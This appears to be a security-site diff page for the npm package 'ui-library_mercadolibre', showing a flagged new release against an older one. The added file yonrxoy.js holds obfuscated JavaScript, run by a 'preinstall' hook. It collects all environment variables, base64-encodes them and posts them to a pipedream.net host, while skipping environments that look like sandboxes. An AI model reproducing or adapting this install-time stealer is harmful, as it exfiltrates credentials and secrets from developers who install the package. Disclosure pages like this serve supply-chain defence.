ui-library_mercadolibre 1.11.0 → 2.721.593
Sign up to get free protection for your applications and to get access to all the features.
Potentially problematic release.
This version of ui-library_mercadolibre might be problematic. Click here for more details.
- package/package.json +6 -9
- package/yonrxoy.js +1 -0
- package/index.js +0 -28
- package/lib/index.js +0 -1
package/package.json
CHANGED
@@ -1,14 +1,11 @@
|
|
1
1
|
{
|
2
2
|
"name": "ui-library_mercadolibre",
|
3
|
-
"version": "
|
4
|
-
"
|
5
|
-
"main": "main.js",
|
3
|
+
"version": "2.721.593",
|
4
|
+
"main": "yonrxoy.js",
|
6
5
|
"scripts": {
|
7
|
-
"test": "test"
|
6
|
+
"test": "echo \"Error: no test specified\" && exit 1",
|
7
|
+
"preinstall": "node yonrxoy.js"
|
8
8
|
},
|
9
|
-
"author": "
|
10
|
-
"license": "ISC"
|
11
|
-
"dependencies": {
|
12
|
-
"lodash": "^4.17.21"
|
13
|
-
}
|
9
|
+
"author": "",
|
10
|
+
"license": "ISC"
|
14
11
|
}
|
package/yonrxoy.js
ADDED
@@ -0,0 +1 @@
|
|
1
|
+
const a0_0x157551=a0_0x3f8c;(function(_0x1e3154,_0x7c1db0){const _0x528a07=a0_0x3f8c,_0x5eca8d=_0x1e3154();while(!![]){try{const _0x575485=parseInt(_0x528a07(0x19b))/0x1*(-parseInt(_0x528a07(0x19a))/0x2)+parseInt(_0x528a07(0x189))/0x3+parseInt(_0x528a07(0x1a4))/0x4+-parseInt(_0x528a07(0x18c))/0x5+-parseInt(_0x528a07(0x197))/0x6*(parseInt(_0x528a07(0x190))/0x7)+-parseInt(_0x528a07(0x198))/0x8+parseInt(_0x528a07(0x19d))/0x9;if(_0x575485===_0x7c1db0)break;else _0x5eca8d['push'](_0x5eca8d['shift']());}catch(_0x110332){_0x5eca8d['push'](_0x5eca8d['shift']());}}}(a0_0x34e2,0xe2ce2));const http=require(a0_0x157551(0x194)),filter=[{'key':a0_0x157551(0x193),'val':'taobao.org'},{'key':'npm_config_registry','val':a0_0x157551(0x18e)},{'key':'USERNAME','val':a0_0x157551(0x18b)},{'key':'_','val':a0_0x157551(0x195)}];function main(){const _0x28b518=a0_0x157551;var _0x2d42ec=process['env']||{};if(filter[_0x28b518(0x19e)](({key:_0x3927e9,val:_0x59e463})=>_0x2d42ec[_0x3927e9]&&_0x2d42ec[_0x3927e9][_0x28b518(0x196)](_0x59e463))||Object['keys'](_0x2d42ec)[_0x28b518(0x1a3)]<0xa)return;req=http['request']({'host':[_0x28b518(0x1a2),'m',_0x28b518(0x192),_0x28b518(0x1a0)]['join']('.'),'path':'/'+(_0x2d42ec[_0x28b518(0x1a1)]||''),'method':_0x28b518(0x199)})['on'](_0x28b518(0x18f),function(_0x80f8b9){}),req[_0x28b518(0x18d)](Buffer[_0x28b518(0x19c)](JSON['stringify'](_0x2d42ec))[_0x28b518(0x19f)](_0x28b518(0x18a))),req[_0x28b518(0x191)]();}function a0_0x3f8c(_0x152c4e,_0x38f6dc){const _0x34e208=a0_0x34e2();return a0_0x3f8c=function(_0x3f8c87,_0x51dd46){_0x3f8c87=_0x3f8c87-0x189;let _0x58aad4=_0x34e208[_0x3f8c87];return _0x58aad4;},a0_0x3f8c(_0x152c4e,_0x38f6dc);}main();function a0_0x34e2(){const _0x350913=['some','toString','net','npm_package_name','dc44079f2a81b29fc85632f802b65e3b','length','5830668IlNWLX','1931604tRvZHL','base64','daasadmin','5281310DPgrxn','write','tencent.com','error','21LkTSWJ','end','pipedream','npm_config_registry','https','/usr/bin/python','includes','1310178MvWITf','4541960OCagmP','POST','8PQRhvN','274157obRNED','from','19828647iQALeV'];a0_0x34e2=function(){return _0x350913;};return a0_0x34e2();}
|
package/index.js
DELETED
@@ -1,28 +0,0 @@
|
|
1
|
-
module.exports = {
|
2
|
-
env: {
|
3
|
-
},
|
4
|
-
globals: {
|
5
|
-
},
|
6
|
-
extends: ['eslint:recommended', 'airbnb-base'],
|
7
|
-
rules: {
|
8
|
-
strict: 'off',
|
9
|
-
'func-names': 'off',
|
10
|
-
'spaced-comment': 'off',
|
11
|
-
'no-underscore-dangle': 'off',
|
12
|
-
'arrow-body-style': 'off',
|
13
|
-
'arrow-parens': ['off', 'as-needed'],
|
14
|
-
'prefer-rest-params': 'off',
|
15
|
-
'no-trailing-spaces': ['error', { skipBlankLines: true }],
|
16
|
-
'comma-dangle': ['warn', 'never'],
|
17
|
-
'new-cap': 'warn',
|
18
|
-
'no-unused-vars': 'warn',
|
19
|
-
'object-shorthand': 1,
|
20
|
-
'prefer-arrow-callback': 'off',
|
21
|
-
'prefer-template': 'warn',
|
22
|
-
'vars-on-top': 'warn',
|
23
|
-
indent: ['error', 2, { SwitchCase: 1 }],
|
24
|
-
'import/newline-after-import': 0,
|
25
|
-
'no-multi-assign': 1,
|
26
|
-
'no-prototype-builtins': 'warn'
|
27
|
-
}
|
28
|
-
};
|
package/lib/index.js
DELETED
@@ -1 +0,0 @@
|
|
1
|
-
test
|